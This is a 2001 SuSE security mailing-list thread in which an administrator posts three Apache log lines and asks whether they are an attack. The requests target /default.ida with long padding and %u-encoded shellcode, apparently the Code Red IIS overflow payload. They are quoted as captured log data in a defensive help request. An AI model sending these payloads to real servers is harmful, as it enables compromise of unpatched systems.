Re: [suse-security] Strange HTTP requests

19 Jul 2001

      ... on the same thread ... are there any known exploits/vulnerabilities for
Apache 1.3.12 running on SuSE?
(The only issue I found on
http://www.suse.com/us/support/security/index.html was dated 07-09-2000 and
just required a minor edit to httpd.conf)
should I upgrade to 1.3.19 anyway?

TIA
Michael

                    Lars Trebing                                                                                   
                    <ltrebing@ltr        To:     SuSE Security Mailing List <suse-security@suse.com>               
                    ebing.de>            cc:                                                                       
                                         Subject:     [suse-security] Strange HTTP requests                        
                    07/19/2001                                                                                     
                    07:46 PM                                                                                       

Hello everyone,

My Apache has just got three strange requests from three different
addresses:

63.149.209.133 - - [19/Jul/2001:18:55:47 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

HTTP/1.0" 400 315
209.215.117.8 - - [19/Jul/2001:19:14:28 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

HTTP/1.0" 400 315
161.184.88.254 - - [19/Jul/2001:19:21:18 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

HTTP/1.0" 400 315

Might this perhaps be an attack for a known bug of some HTTP server?
Should I maybe even worry about this? (I am running Apache 1.3.12).

By the way, I performed the same request locally and got a 404 error
instead of the 400s reported in the log.

TIA, Lars

--
To unsubscribe, e-mail: suse-security-unsubscribe@suse.com
For additional commands, e-mail: suse-security-help@suse.com

Re: [suse-security] Strange HTTP requests

michael.ryan＠storm.ie